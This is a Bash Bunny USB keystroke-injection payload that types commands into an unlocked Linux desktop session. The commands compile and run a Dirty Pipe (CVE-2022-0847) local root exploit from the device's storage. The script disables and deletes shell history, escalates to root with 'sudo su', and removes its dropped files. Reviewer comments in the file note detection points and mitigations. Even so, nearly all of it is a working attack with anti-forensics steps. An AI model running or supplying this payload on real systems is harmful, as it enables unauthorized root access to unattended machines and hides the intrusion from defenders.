# Title: DirtyPipe
# Description: Exploit for a new Linux vulnerability known as 'Dirty Pipe' (CVE-2022-0847), which allows local users to gain root privileges.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: Linux operating systems.
# Attackmodes: HID, Storage
# Bash Bunny payload: the lines below run on the Bunny itself. Every `Q` line
# is sent to the target as keyboard input; the single-quoted `$...` fragments
# stop the Bunny's own shell from expanding them, so the target shell expands
# them instead.
#
# [Device setup]
# The Bunny enumerates as a USB mass-storage device and a HID keyboard at the
# same time. Defender view: one USB device registering both interfaces shows
# up in the kernel log and udev events, and a USB authorization policy
# (e.g. USBGuard) can refuse the unexpected keyboard.
LED SETUP
ATTACKMODE STORAGE HID
# Reads the payload-selector switch; SWITCH_POSITION is not referenced again
# in this payload.
GET SWITCH_POSITION
LED ATTACK
# Delays are in milliseconds and pace the typing against the target's UI.
Q DELAY 1000
# Desktop shortcut for a terminal; this assumes an unlocked graphical session
# with that shortcut bound, so a locked screen stops the payload here.
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
# Anti-forensics: commands typed in this terminal are kept out of shell
# history, so responders need process telemetry (auditd execve records, EDR)
# rather than the history file to reconstruct the session.
Q STRING unset HISTFILE
Q ENTER
Q DELAY 100
Q STRING HISTSIZE=0
Q ENTER
Q DELAY 100
# NOTE(review): HISTFILE was unset two commands earlier in the same shell, so
# the pre-existing history file is likely still on disk for triage - confirm.
Q STRING rm -f '$HISTFILE'
Q ENTER
Q DELAY 100
# [Fetching BashBunny's block device]
# Identifies the Bunny's storage purely by a reported size of 1.8G in lsblk
# output; the match is by size string, not by label or serial.
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
# After quoting is resolved this types: disk=$(echo $lol | awk '{print $1}')
# i.e. the first lsblk column (device name) of the matched line.
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
# Mounts through udisks as the logged-in user, so no root is needed yet.
# Defender view: a udisks mount of removable media requested from a terminal
# seconds after a new keyboard appeared is a usable correlation.
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
# The actual mount point is read back from lsblk column 7 (mount point in the
# default lsblk layout) rather than assumed.
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transferring and executing exploit]
# The exploit arrives as C source and is compiled on the target. Defender
# view: gcc run by an interactive user on a file in /tmp, followed by
# execution of the resulting binary from /tmp, are both detectable; mounting
# /tmp noexec, keeping compilers off endpoints and running a kernel patched
# for CVE-2022-0847 each break this stage.
Q STRING cp -r '$mntt'/payloads/library/dirtypipe.c /tmp/
Q ENTER
Q DELAY 100
Q STRING gcc /tmp/dirtypipe.c -o /tmp/dirtypipe
Q ENTER
Q DELAY 1000
Q STRING chmod +x /tmp/dirtypipe
Q ENTER
# Runs the compiled binary with /bin/bash as its argument; what the argument
# means is defined in dirtypipe.c, which is not shown here.
Q STRING /tmp/./dirtypipe /bin/bash
Q ENTER
Q DELAY 500
Q STRING sudo su
Q ENTER
# A second terminal is opened for cleanup; it is a fresh shell, so none of the
# variables set above exist in it.
Q CTRL-ALT t
Q DELAY 500
# Removes the dropped source and binary. The files are gone after this, but
# their creation, compilation and execution remain in audit/EDR telemetry.
Q STRING rm /tmp/dirtypipe
Q ENTER
Q DELAY 100
Q STRING rm /tmp/dirtypipe.c
Q ENTER
Q DELAY 200
# [Unmounting BashBunny]
# History is disabled again and the device name re-derived because this is
# the new shell.
Q STRING unset HISTFILE
Q ENTER
Q DELAY 100
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 100
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
# Closes the cleanup terminal; the first terminal is not closed by this payload.
Q STRING exit
Q ENTER
LED FINISH